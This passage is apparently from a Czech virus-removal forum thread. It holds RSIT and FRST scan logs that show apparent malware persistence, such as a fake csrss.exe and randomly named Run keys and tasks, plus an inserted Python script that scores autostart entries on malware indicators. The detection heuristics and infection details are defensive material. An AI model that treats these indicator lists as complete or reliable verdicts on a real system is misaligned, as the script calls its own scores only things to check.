S2 ekrn;ESET Service; C:\Program Files\ESET\ESET Security\ekrn.exe []
S2 gupdate;Služba Aktualizace Google (gupdate); C:\Program Files\Google\Update\GoogleUpdate.exe [2020-03-19 156104]
S2 Hamachi2Svc;LogMeIn Hamachi Tunneling Engine; C:\Program Files\LogMeIn Hamachi\hamachi-2.exe [2019-04-02 2243528]
S2 LMIGuardianSvc;LMIGuardianSvc; C:\Program Files\LogMeIn Hamachi\LMIGuardianSvc.exe [2016-05-27 405424]
S2 LogiRegistryService;Logitech Gaming Registry Service; C:\Program Files\Logitech Gaming Software\Drivers\APOService\LogiRegistryService.exe [2018-05-07 175240]
S2 MacriumService;Macrium Service; C:\Program Files\Macrium\Common\MacriumService.exe [2020-08-05 5996880]
S2 MapsBroker;@%SystemRoot%\System32\moshost.dll,-100; C:\WINDOWS\System32\svchost.exe [2019-12-07 47232]
S2 MobiGameUpdater;MobiGameUpdater; C:\Program Files\MobiGame\MobiGameUpdater.exe [2020-08-28 256000]
S2 OneSyncSvc;@%SystemRoot%\system32\APHostRes.dll,-10002; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S2 OneSyncSvc_5fd3e;Hostitel synchronizace_5fd3e; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 AarSvc;@%SystemRoot%\system32\AarSvc.dll,-100; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 AarSvc_5fd3e;Agent Activation Runtime_5fd3e; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 AJRouter;@%SystemRoot%\system32\AJRouter.dll,-2; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 AssignedAccessManagerSvc;@%SystemRoot%\system32\assignedaccessmanagersvc.dll,-100; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 autotimesvc;@%SystemRoot%\System32\autotimesvc.dll,-6; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 BcastDVRUserService;@%SystemRoot%\system32\BcastDVRUserService.dll,-100; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 BcastDVRUserService_5fd3e;Uživatelská služba pro GameDVR a vysílání her_5fd3e; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 BluetoothUserService;@%SystemRoot%\system32\Microsoft.Bluetooth.UserService.dll,-101; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 BluetoothUserService_5fd3e;Služba pro podporu uživatelů Bluetooth_5fd3e; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 BTAGService;@%SystemRoot%\system32\BTAGService.dll,-101; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 BthAvctpSvc;@%SystemRoot%\system32\BthAvctpSvc.dll,-101; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 camsvc;@%SystemRoot%\system32\CapabilityAccessManager.dll,-1; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 CaptureService;@%SystemRoot%\system32\CaptureService.dll,-100; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 CaptureService_5fd3e;CaptureService_5fd3e; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 cbdhsvc;@%SystemRoot%\system32\cbdhsvc.dll,-100; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 ClipSVC;@%SystemRoot%\system32\ClipSVC.dll,-103; C:\WINDOWS\System32\svchost.exe [2019-12-07 47232]
S3 ConsentUxUserSvc;@%SystemRoot%\system32\ConsentUxClient.dll,-100; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 ConsentUxUserSvc_5fd3e;ConsentUX_5fd3e; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 CredentialEnrollmentManagerUserSvc;@%SystemRoot%\system32\CredentialEnrollmentManager.exe,-100; C:\WINDOWS\system32\CredentialEnrollmentManager.exe [2020-09-03 287648]
S3 CredentialEnrollmentManagerUserSvc_5fd3e;CredentialEnrollmentManagerUserSvc_5fd3e; C:\WINDOWS\system32\CredentialEnrollmentManager.exe [2020-09-03 287648]
S3 DeviceAssociationBrokerSvc;@%SystemRoot%\system32\deviceaccess.dll,-107; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 DeviceAssociationBrokerSvc_5fd3e;DeviceAssociationBroker_5fd3e; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 DevicePickerUserSvc;@%SystemRoot%\system32\Windows.Devices.Picker.dll,-1006; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 DevicePickerUserSvc_5fd3e;DevicePicker_5fd3e; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 DevicesFlowUserSvc;@%SystemRoot%\system32\DevicesFlowBroker.dll,-103; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 DevicesFlowUserSvc_5fd3e;Tok zařízení_5fd3e; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 DevQueryBroker;@%SystemRoot%\system32\DevQueryBroker.dll,-100; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 diagnosticshub.standardcollector.service;@%SystemRoot%\system32\DiagSvcs\DiagnosticsHub.StandardCollector.ServiceRes.dll,-1000; C:\WINDOWS\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe [2020-09-03 71680]
S3 diagsvc;@%systemroot%\system32\DiagSvc.dll,-100; C:\WINDOWS\System32\svchost.exe [2019-12-07 47232]
S3 Disc Soft Lite Bus Service;Disc Soft Lite Bus Service; C:\Program Files\DAEMON Tools Lite\DiscSoftBusServiceLite.exe [2020-03-19 4069992]
S3 DisplayEnhancementService;@%SystemRoot%\System32\Microsoft.Graphics.Display.DisplayEnhancementService.dll,-1000; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 DmEnrollmentSvc;@%systemroot%\system32\Windows.Internal.Management.dll,-100; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 dmwappushservice;@%SystemRoot%\system32\dmwappushsvc.dll,-200; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 DsSvc;@%SystemRoot%\system32\dssvc.dll,-10003; C:\WINDOWS\System32\svchost.exe [2019-12-07 47232]
S3 EasyAntiCheat;EasyAntiCheat; C:\Program Files\EasyAntiCheat\EasyAntiCheat.exe [2020-10-11 802432]
S3 edgeupdatem;Služba Microsoft Edge Update (edgeupdatem); C:\Program Files\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe [2020-06-13 224160]
S3 embeddedmode;@%SystemRoot%\system32\embeddedmodesvc.dll,-201; C:\WINDOWS\System32\svchost.exe [2019-12-07 47232]
S3 EntAppSvc;@EnterpriseAppMgmtSvc.dll,-1; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 FrameServer;@%systemroot%\system32\FrameServer.dll,-100; C:\WINDOWS\System32\svchost.exe [2019-12-07 47232]
S3 GoogleChromeElevationService;Google Chrome Elevation Service; C:\Program Files\Google\Chrome\Application\86.0.4240.75\elevation_service.exe [2020-10-05 1123312]
S3 GraphicsPerfSvc;@%SystemRoot%\system32\GraphicsPerfSvc.dll,-100; C:\WINDOWS\System32\svchost.exe [2019-12-07 47232]
S3 gupdatem;Služba Aktualizace Google (gupdatem); C:\Program Files\Google\Update\GoogleUpdate.exe [2020-03-19 156104]
S3 icssvc;@%SystemRoot%\System32\tetheringservice.dll,-4097; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 InstallService;@%SystemRoot%\system32\InstallService.dll,-200; C:\WINDOWS\System32\svchost.exe [2019-12-07 47232]
S3 IpxlatCfgSvc;@%Systemroot%\system32\ipxlatcfg.dll,-500; C:\WINDOWS\System32\svchost.exe [2019-12-07 47232]
S3 LicenseManager;@%SystemRoot%\system32\licensemanagersvc.dll,-200; C:\WINDOWS\System32\svchost.exe [2019-12-07 47232]
S3 LxpSvc;@%SystemRoot%\system32\LanguageOverlayServer.dll,-100; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 MessagingService;@%SystemRoot%\system32\MessagingService.dll,-100; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 MessagingService_5fd3e;Služba zasílání zpráv_5fd3e; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 MicrosoftEdgeElevationService;Microsoft Edge Elevation Service; C:\Program Files\Microsoft\Edge\Application\86.0.622.43\elevation_service.exe [2020-10-14 1360272]
S3 NaturalAuthentication;@%systemroot%\system32\NaturalAuth.dll,-100; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 NetSetupSvc;@%SystemRoot%\system32\NetSetupSvc.dll,-3; C:\WINDOWS\System32\svchost.exe [2019-12-07 47232]
S3 ose;Office Source Engine; C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE [2015-07-31 202928]
S3 perceptionsimulation;@%systemroot%\system32\PerceptionSimulation\PerceptionSimulationService.exe,-101; C:\WINDOWS\system32\PerceptionSimulation\PerceptionSimulationService.exe [2019-12-07 80384]
S3 PhoneSvc;@%SystemRoot%\system32\PhoneserviceRes.dll,-10000; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 PimIndexMaintenanceSvc;@%SystemRoot%\system32\UserDataAccessRes.dll,-15001; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 PimIndexMaintenanceSvc_5fd3e;Data kontaktů_5fd3e; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 PrintWorkflowUserSvc;@%SystemRoot%\system32\PrintWorkflowService.dll,-100; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 PrintWorkflowUserSvc_5fd3e;PrintWorkflow_5fd3e; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 PushToInstall;@%SystemRoot%\system32\pushtoinstall.dll,-200; C:\WINDOWS\System32\svchost.exe [2019-12-07 47232]
S3 RetailDemo;@%SystemRoot%\System32\RDXService.dll,-256; C:\WINDOWS\System32\svchost.exe [2019-12-07 47232]
S3 RmSvc;@%SystemRoot%\system32\RMapi.dll,-1001; C:\WINDOWS\System32\svchost.exe [2019-12-07 47232]
S3 SecurityHealthService;@%systemroot%\system32\SecurityHealthAgent.dll,-1002; C:\WINDOWS\system32\SecurityHealthService.exe [2020-09-03 790232]
S3 SEMgrSvc;@%SystemRoot%\System32\SEMgrSvc.dll,-1001; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 Sense;@%ProgramFiles%\Windows Defender Advanced Threat Protection\MsSense.exe,-1001; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [2020-09-03 3918680]
S3 SensorDataService;@%SystemRoot%\system32\SensorDataService.exe,-101; C:\WINDOWS\System32\SensorDataService.exe [2019-12-07 870912]
S3 SensorService;@%SystemRoot%\System32\sensorservice.dll,-1000; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 SharedRealitySvc;@%SystemRoot%\system32\SharedRealitySvc.dll,-100; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 SmsRouter;@%SystemRoot%\System32\SmsRouterSvc.dll,-10001; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S3 spectrum;@%systemroot%\system32\spectrum.exe,-101; C:\WINDOWS\system32\spectrum.exe [2019-12-07 626688]
S3 Steam Client Service;Steam Client Service; C:\Program Files\Common Files\Steam\SteamService.exe [2020-10-20 1876256]
S4 AppVClient;@%systemroot%\system32\AppVClient.exe,-102; C:\WINDOWS\system32\AppVClient.exe [2019-12-07 622624]
S4 shpamsvc;@%SystemRoot%\System32\Windows.SharedPC.AccountManager.dll,-100; C:\WINDOWS\System32\svchost.exe [2019-12-07 47232]
S4 ssh-agent;OpenSSH Authentication Agent; C:\WINDOWS\System32\OpenSSH\ssh-agent.exe [2019-04-18 323584]
-----------------EOF-----------------
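An added example, not part of the RSIT or FRST output above and not code from either tool: a small Python triage script that reads autostart entries in the line formats both tools print (the RSIT service lines above and the FRST Run-key, scheduled-task, service and driver lines posted later in this thread) and counts, per entry, the indicators an analyst checks first: FRST's own ATTENTION marker, a missing Authenticode signature, a WDK test-signing certificate, no size/date for the launched file, a launch point inside the user profile, an unsigned binary directly under C:\WINDOWS, a hex or GUID machine-generated name, and a core system process name (csrss.exe) living outside its home directory. The sample lines are copied verbatim from the logs in this thread; the flag names, the scoring, the list of core system binaries and the assumption that the system drive is C: are this example's own choices.

```python
import ntpath
import re
from collections import defaultdict
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Sample input: autostart entries copied verbatim from the RSIT and FRST logs in this thread.
SAMPLE_LINES = [
    r"S3 Steam Client Service;Steam Client Service; C:\Program Files\Common Files\Steam\SteamService.exe [2020-10-20 1876256]",
    r"HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\Run: [MuddyGlade] => C:\WINDOWS\rss\csrss.exe [4080640 2020-09-27] () [File not signed] <==== ATTENTION",
    r'HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\Run: [rfxgnkvq] => "C:\Users\42072\izhfpkrf.exe"',
    r"HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\Run: [CloudNet] => C:\Users\42072\AppData\Roaming\16f618eaf6a0\16f618eaf6a0.exe [549376 2020-10-20] () [File not signed] <==== ATTENTION",
    r"HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\Run: [Steam] => C:\Program Files\Steam\steam.exe [3416352 2020-10-15] (Valve -> Valve Corporation)",
    r"Task: {204ECE63-4E6A-4770-A8E1-979A2508CEBF} - System32\Tasks\NvNgxUpdateCheckDaily_{2A68F03E-F03E-F03E-F03E-2A68F03EF03E} => C:\Users\42072\AppData\Roaming\fweigsc.exe <==== ATTENTION",
    r"Task: {FFB214BF-B5AF-4129-AFD4-D5FE103A286B} - System32\Tasks\Time Trigger Task => C:\Users\42072\AppData\Local\9ed9efac-d91e-4bae-b8a6-b37bff330bfb\7DCE.exe <==== ATTENTION",
    r'Task: {C4E5A3FD-EB6B-4D00-8FAD-EF74A2B6DC50} - System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(1): schtasks.exe -> /Change /TN "\MicrosoftEdgeUpdateTaskMachineCore" /ENABLE',
    r"R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2009.7-0\MsMpEng.exe [86088 2020-10-10] (Microsoft Windows Publisher -> Microsoft Corporation)",
    r"S2 WinDefender; C:\WINDOWS\windefender.exe [1987072 2020-09-11] () [File not signed]",
    r"S1 16F618EAF6A0; C:\WINDOWS\16F618EAF6A0.sys [21784 2020-09-11] (大连纵梦网络科技有限公司 -> FsFilter Network) [File not signed]",
    r"S1 WinmonProcessMonitor; C:\WINDOWS\System32\drivers\WinmonProcessMonitor.sys [28368 2020-09-11] (WDKTestCert Admin,131666266076831434 -> ) [File not signed] <==== ATTENTION",
]

# Where the launched binary, the "[size date]" (FRST) / "[date size]" (RSIT) block and the
# "(signer -> publisher)" block sit on a line.
PATH_RE = re.compile(r'(?:=>|;)\s*"?([a-z]:\\[^"\[<]*?\.(?:exe|sys|dll))(?=["\s]|$)', re.I)
META_RE = re.compile(r"\[(?:\d+ (\d{4}-\d{2}-\d{2})|(\d{4}-\d{2}-\d{2}) \d+)\]")
SIGNER_RE = re.compile(r"\(([^()]*) -> ([^()]*)\)")
USER_PROFILE = re.compile(r"^[a-z]:\\Users\\", re.I)
WINDOWS_DIR = re.compile(r"^[a-z]:\\WINDOWS\\", re.I)
SYSTEM_DIRS = re.compile(r"^[a-z]:\\WINDOWS\\(System32|SysWOW64)\\", re.I)
HEX_STEM = re.compile(r"^[0-9a-f]{12,}$", re.I)
GUID_DIR = re.compile(r"\\[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}\\", re.I)
NAME_PATTERNS = (r"\\Run(?:Once)?: \[([^\]]+)\] =>", r"System32\\Tasks\\(.+?) =>", r"^[SR]\d\s+([^;]+);")
# Core Windows processes and the only directories they legitimately run from (drive C: assumed).
SYSTEM_BINARIES = {
    **{n: {r"c:\windows\system32"} for n in
       ("csrss.exe", "smss.exe", "lsass.exe", "wininit.exe", "winlogon.exe", "services.exe")},
    "svchost.exe": {r"c:\windows\system32", r"c:\windows\syswow64"},
    "explorer.exe": {r"c:\windows", r"c:\windows\syswow64"},
}


@dataclass
class Finding:
    name: str
    path: str
    file_date: Optional[str]
    flags: List[str] = field(default_factory=list)

    @property
    def score(self) -> int:
        return len(self.flags)


def entry_name(line: str) -> str:
    """Run-key value name, task name or service/driver name, whichever the line carries."""
    hits = (re.search(p, line) for p in NAME_PATTERNS)
    return next((m.group(1) for m in hits if m), "?")


def triage_line(line: str) -> Optional[Finding]:
    """Score one RSIT/FRST entry; None for lines that launch no on-disk binary."""
    m = PATH_RE.search(line)
    if not m:
        return None  # e.g. task actions of the form "Command(1): schtasks.exe -> ..."
    path = m.group(1)
    meta = META_RE.search(line)
    f = Finding(entry_name(line), path, (meta.group(1) or meta.group(2)) if meta else None)
    unsigned = "[File not signed]" in line
    sig = SIGNER_RE.search(line)
    base = ntpath.basename(path).lower()  # ntpath parses Windows paths on any host OS
    if "<==== ATTENTION" in line:
        f.flags.append("frst_attention")            # FRST's own marker
    if unsigned:
        f.flags.append("unsigned")
    if sig and "WDKTestCert" in sig.group(1):
        f.flags.append("test_signing_cert")         # driver signed with a WDK test certificate
    if meta is None:
        f.flags.append("no_file_metadata")          # the tool printed no size/date for the file
    if USER_PROFILE.match(path):
        f.flags.append("user_writable_path")        # autostart from inside the user profile
    if unsigned and WINDOWS_DIR.match(path) and not SYSTEM_DIRS.match(path):
        f.flags.append("unsigned_in_windows_dir")
    if HEX_STEM.match(ntpath.splitext(base)[0]) or GUID_DIR.search(path):
        f.flags.append("machine_generated_name")
    if base in SYSTEM_BINARIES and ntpath.dirname(path).lower() not in SYSTEM_BINARIES[base]:
        f.flags.append("system_name_outside_home")  # e.g. csrss.exe anywhere but System32
    return f


def triage(lines, min_score: int = 1) -> List[Finding]:
    found = [f for f in map(triage_line, lines) if f and f.score >= min_score]
    return sorted(found, key=lambda f: (-f.score, f.name.lower()))


def cluster_by_file_date(lines) -> Dict[str, List[str]]:
    """Entries grouped by the file date the tool printed; a burst on one day marks an install window."""
    out = defaultdict(list)
    for f in filter(None, map(triage_line, lines)):
        if f.file_date:
            out[f.file_date].append(f.name)
    return dict(out)


if __name__ == "__main__":
    for f in triage(SAMPLE_LINES):
        print(f"{f.score}  {f.name:<24} {f.path}\n   {', '.join(f.flags)}")
    for day, names in sorted(cluster_by_file_date(SAMPLE_LINES).items()):
        print(day, names)
```

Run as-is it prints the ranked list for the sample entries; pass the Registry, Scheduled Tasks, Services and Drivers sections of a full FRST.txt (or the services section of an RSIT log) to `triage()` for the same ranking on another log. The score is a count of things to check, not a verdict: FRST's own ATTENTION marker already singles out most of the same entries, and `cluster_by_file_date()` adds the pivot an analyst wants next, grouping windefender.exe, 16F618EAF6A0.sys and the Winmon driver under the same 2020-09-11 file date, the day the securesearch.org homepage entry in the Firefox profile also carries.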

PC virus removal, computer speed-up, remote assistance via the neslape.cz service
please check my RSIT log
Moderator: Moderators
Forum rules
If you want help, post a log from FRST [guide here] or RSIT [guide here]
Individual threads will be locked once resolved, as will those that have been inactive for more than 14 days. See the rule on locking topics. Thank you for your understanding.
NEW!
You can now use the remote assistance service, where a specialist connects to your computer and obtains further details about the problem from you by phone. More at www.neslape.cz
- Rudy
- Site Admin
- Posts: 119418
- Registered: 30 Oct 2003 13:42
- Location: Plzeň
Re: please check my RSIT log
Hello!
RSIT is not fully compatible with Windows 10. Post the FRST + Addition logs: https://forum.viry.cz/viewtopic.php?f=13&t=154679 .
Post questions and logs only in your own threads. Private messages, ICQ and e-mails are not for solving your problems.
Please support our forum: https://platba.viry.cz/payment/.
e-mail: rudy(at)forum.viry.cz
Warning: Before disinfecting your PC, back up your important data (mail, contacts, documents, photos, videos, music, etc.). Apart from its "visible" activity, a virus may damage the system!
Once your problem is resolved the thread will be locked, as it will be if it is inactive for more than 14 days. If you want the thread reactivated, write to the e-mail address given above.
Re: please check my RSIT log
Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 19-10-2020
Ran by 42072 (administrator) on DESKTOP-4NQUTUE (20-10-2020 22:08:19)
Running from C:\Users\42072\Desktop
Loaded Profiles: 42072
Platform: Microsoft Windows 10 Pro Version 2004 19041.450 (X86) Language: Čeština (Česko)
Default browser: Edge
Boot Mode: Safe Mode (minimal)
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/33 ... scan-tool/
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(AVB Disc Soft, SIA -> Disc Soft Ltd) C:\Program Files\DAEMON Tools Lite\DTShellHlp.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\HelpPane.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe <2>
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\oobe\UserOOBEBroker.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2009.7-0\MsMpEng.exe
==================== Registry (Whitelisted) ===================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [StartCCC] => C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\x86\CLIStart.exe [748744 2015-11-04] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
HKLM\...\Run: [LogMeIn Hamachi Ui] => C:\Program Files\LogMeIn Hamachi\hamachi-2-ui.exe [5890504 2019-04-02] (LogMeIn, Inc. -> LogMeIn Inc.)
HKLM\...\Run: [seznam-listicka-distribuce] => C:\Program Files\Seznam.cz\distribution\szninstall.exe [1069296 2018-03-27] (Seznam.cz, a.s. -> )
HKLM\...\Run: [LogiOptions] => C:\Program Files\Logitech\LogiOptions\LogiOptions.exe [1718408 2020-04-27] (Logitech Inc -> Logitech, Inc.)
HKLM\...\Run: [Reflect UI] => C:\Program Files\Macrium\Common\ReflectUI.exe [6131976 2020-08-05] (Paramount Software UK Ltd -> Paramount Software UK Ltd)
HKLM\...\Run: [DiskFixer] => C:\Program Files\DiskFixer\DiskFixer.exe [247808 2019-07-04] () [File not signed] <==== ATTENTION
HKLM\...\Run: [Launch LCore] => C:\Program Files\Logitech Gaming Software\LCore.exe [13868168 2018-05-07] (Logitech Inc -> Logitech Inc.)
HKLM\...\Run: [SunJavaUpdateSched] => C:\Program Files\Common Files\Java\Java Update\jusched.exe [710264 2020-06-18] (Oracle America, Inc. -> Oracle Corporation)
HKU\S-1-5-19\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [516608 2019-12-07] (Microsoft Windows -> Microsoft Corporation)
HKU\S-1-5-20\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [516608 2019-12-07] (Microsoft Windows -> Microsoft Corporation)
HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\Run: [DAEMON Tools Lite Automount] => C:\Program Files\DAEMON Tools Lite\DTAgent.exe [365672 2020-03-19] (AVB Disc Soft, SIA -> Disc Soft Ltd)
HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\Run: [EpicGamesLauncher] => C:\Program Files\Epic Games\Launcher\Portal\Binaries\Win32\EpicGamesLauncher.exe [26028432 2020-07-03] (Epic Games Inc. -> Epic Games, Inc.)
HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\Run: [Spotify] => C:\Users\42072\AppData\Roaming\Spotify\Spotify.exe [23220456 2020-07-05] (Spotify AB -> Spotify Ltd)
HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\Run: [Mobigame Playstore] => C:\Program Files\MobiGame\playstore\playstore.exe [135680 2020-08-28] () [File not signed]
HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\Run: [MuddyGlade] => C:\WINDOWS\rss\csrss.exe [4080640 2020-09-27] () [File not signed] <==== ATTENTION
HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\Run: [Web Companion] => C:\Program Files\Lavasoft\Web Companion\Application\WebCompanion.exe --minimize
HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\Run: [rfxgnkvq] => "C:\Users\42072\izhfpkrf.exe"
HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\Run: [CloudNet] => C:\Users\42072\AppData\Roaming\16f618eaf6a0\16f618eaf6a0.exe [549376 2020-10-20] () [File not signed] <==== ATTENTION
HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\Run: [Steam] => C:\Program Files\Steam\steam.exe [3416352 2020-10-15] (Valve -> Valve Corporation)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files\Google\Chrome\Application\86.0.4240.75\Installer\chrmstp.exe [2020-10-09] (Google LLC -> Google LLC)
HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION
HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
==================== Scheduled Tasks (Whitelisted) ============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
Task: {0204B8D3-DE41-47BC-908C-4991B4B01C81} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2009.7-0\MpCmdRun.exe [460640 2020-10-10] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {035C66D3-3267-4413-8AA1-62DEE2FE48E5} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files\Google\Update\GoogleUpdate.exe [156104 2020-03-19] (Google LLC -> Google LLC)
Task: {18F6FB00-BC5E-40F2-B942-28C444FA801F} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [314544 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Task: {204ECE63-4E6A-4770-A8E1-979A2508CEBF} - System32\Tasks\NvNgxUpdateCheckDaily_{2A68F03E-F03E-F03E-F03E-2A68F03EF03E} => C:\Users\42072\AppData\Roaming\fweigsc.exe <==== ATTENTION
Task: {431477B5-ED35-4340-8CAA-B6BB67524844} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office16\OLicenseHeartbeat.exe [124632 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Task: {64A8F9E3-A3B3-4C83-BBEB-DBC19AC5FE37} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2009.7-0\MpCmdRun.exe [460640 2020-10-10] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {6AB4A925-F182-4226-B65D-EF244AAA012C} - System32\Tasks\Mozilla\Firefox Default Browser Agent 308046B0AF4A39CB => C:\Program Files\Mozilla Firefox\default-browser-agent.exe [600784 2020-10-13] (Mozilla Corporation -> Mozilla Foundation)
Task: {786FA461-0DED-4BF7-9479-9BAA2E1587AC} - System32\Tasks\NvNgxUpdateCheckDaily_{A6B397E0-97E0-97E0-97E0-A6B397E097E0} => C:\Users\42072\AppData\Roaming\jgeigsc.exe <==== ATTENTION
Task: {847F1E03-98FC-4129-AA18-E7CDB55634DD} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [314544 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Task: {9D1BEBE2-2DD4-4A25-A32C-B86C65CCDEAA} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2009.7-0\MpCmdRun.exe [460640 2020-10-10] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {AD86ADA3-1803-4D49-9974-AC4B675E2828} - System32\Tasks\csrss => C:\WINDOWS\rss\csrss.exe [4080640 2020-09-27] () [File not signed] <==== ATTENTION
Task: {C22B2574-9B3A-4D68-868F-AE2834A8D1E1} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2009.7-0\MpCmdRun.exe [460640 2020-10-10] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {C4E5A3FD-EB6B-4D00-8FAD-EF74A2B6DC50} - System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(1): schtasks.exe -> /Change /TN "\MicrosoftEdgeUpdateTaskMachineCore" /ENABLE
Task: {C4E5A3FD-EB6B-4D00-8FAD-EF74A2B6DC50} - System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(2): schtasks.exe -> /Change /TN "\MicrosoftEdgeUpdateTaskMachineUA" /ENABLE
Task: {C4E5A3FD-EB6B-4D00-8FAD-EF74A2B6DC50} - System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(3): schtasks.exe -> /Change /TN "\AVAST Software\Gaming mode Task Scheduler recovery" /DISABLE
Task: {D5436AFF-CA8D-4256-81CB-5800BB0CDA01} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files\Google\Update\GoogleUpdate.exe [156104 2020-03-19] (Google LLC -> Google LLC)
Task: {FFB214BF-B5AF-4129-AFD4-D5FE103A286B} - System32\Tasks\Time Trigger Task => C:\Users\42072\AppData\Local\9ed9efac-d91e-4bae-b8a6-b37bff330bfb\7DCE.exe <==== ATTENTION
